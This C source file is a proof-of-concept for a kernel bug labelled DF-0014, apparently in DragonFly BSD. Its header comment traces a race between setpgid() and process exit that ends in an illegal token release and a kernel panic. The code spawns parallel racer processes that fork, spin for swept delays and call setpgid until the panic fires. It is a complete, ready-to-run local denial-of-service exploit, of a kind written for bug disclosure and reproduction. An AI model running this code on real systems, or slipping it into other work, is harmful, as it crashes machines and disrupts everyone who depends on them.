/*
 * DF-0014 PoC - enterpgrp() lwkt_reltoken on an un-acquired token -> panic.
 *
 * Bug: enterpgrp() new-pgrp error path (sys/kern/kern_proc.c:763-768) calls
 * lwkt_reltoken(&prg->proc_token) at :764 without the token held. pfindn()
 * (:544-575) never returns with proc_token held; enterpgrp acquires it only
 * on the success path at :770. Releasing an un-held token triggers
 * panic("lwkt_reltoken: illegal release") (sys/kern/lwkt_token.c:853).
 *
 * Race (confirmed by line-by-line trace of sys/kern/kern_exit.c +
 * kern_prot.c + kern_proc.c):
 *
 *   parent                           child (target of setpgid)
 *   ------                           -----
 *   sys_setpgid:372 pfind(child)     exit1():304 gettoken(p_token)
 *     -> child SACTIVE                ...fd cleanup, vmspace exit...
 *   sys_setpgid:379                 exit1():432 reltoken(p_token)
 *     gettoken(targp->p_token)       exit1():433 vmspace_relexit
 *     -> BLOCKS (child holds it      exit1():434 gettoken(p_token)
 *        from :434+:child past        ...reaper/session/child reparent...
 *        vmspace_relexit)            kern_proc.c:1189 p_stat = SZOMB
 *                                    exit1():792 reltoken(p_token)
 *     -> parent woken, p_token
 *   enterpgrp:763 pfindn(child)
 *     -> child is SZOMB -> NULL
 *   enterpgrp:764 lwkt_reltoken(NOT HELD)
 *     -> PANIC
 *
 * The window: parent's pfind(:372) must see SACTIVE, then parent blocks at
 * gettoken(:379) because child holds p_token (child is past exit1:434). Child
 * becomes SZOMB at kern_proc.c:1189, releases p_token at exit1:792. Parent's
 * pfindn then sees SZOMB -> error path -> panic.
 *
 * The child needs ~20-100us to reach the exit1:434..528 window after fork.
 * We sweep a wide spin-delay range so some iterations land the child exactly
 * there. Periodic sched_yield() covers the case where child was placed on
 * the same CPU as the parent.
 *
 * Build:  cc -O2 -o setpgid_panic setpgid_panic.c
 * Run:    ./setpgid_panic [sweep_max] [parallel] [yield_every]
 *         defaults: sweep=150000 parallel=4 yield=0
 */

#include <unistd.h>
#include <sys/wait.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static volatile unsigned long g_sink;

static inline void
spin_delay(unsigned long n, unsigned long yield_every)
{
	volatile unsigned long *sink = &g_sink;
	unsigned long i;
	for (i = 0; i < n; i++) {
		*sink += i;
		if (yield_every && (i % yield_every) == 0 && i > 0)
			sched_yield();
	}
}

static void
racer(unsigned long sweep_max, unsigned long id, unsigned long yield_every)
{
	unsigned long i;

	for (i = 0;; i++) {
		pid_t c = fork();
		if (c < 0) {
			perror("fork");
			_exit(1);
		}
		if (c == 0)
			_exit(0);

		spin_delay((i % sweep_max), yield_every);

		setpgid(c, 0);

		while (waitpid(c, NULL, 0) < 0)
			;

		if ((i & 0x3fff) == 0)
			fprintf(stderr, "[racer %lu] %lu iters\n", id, i);
	}
}

int
main(int argc, char **argv)
{
	unsigned long sweep_max = 150000;
	unsigned long parallel = 4;
	unsigned long yield_every = 0;
	unsigned long k;

	if (argc > 1)
		sweep_max = (unsigned long)atol(argv[1]);
	if (argc > 2)
		parallel = (unsigned long)atol(argv[2]);
	if (argc > 3)
		yield_every = (unsigned long)atol(argv[3]);

	fprintf(stderr,
		"[*] DF-0014 racer: sweep=%lu parallel=%lu yield_every=%lu\n",
		sweep_max, parallel, yield_every);

	if (parallel <= 1) {
		racer(sweep_max, 0, yield_every);
		return 0;
	}

	for (k = 1; k < parallel; k++) {
		pid_t p = fork();
		if (p < 0) {
			perror("fork");
			return 1;
		}
		if (p == 0) {
			racer(sweep_max, k, yield_every);
			_exit(0);
		}
	}
	racer(sweep_max, 0, yield_every);
	return 0;
}
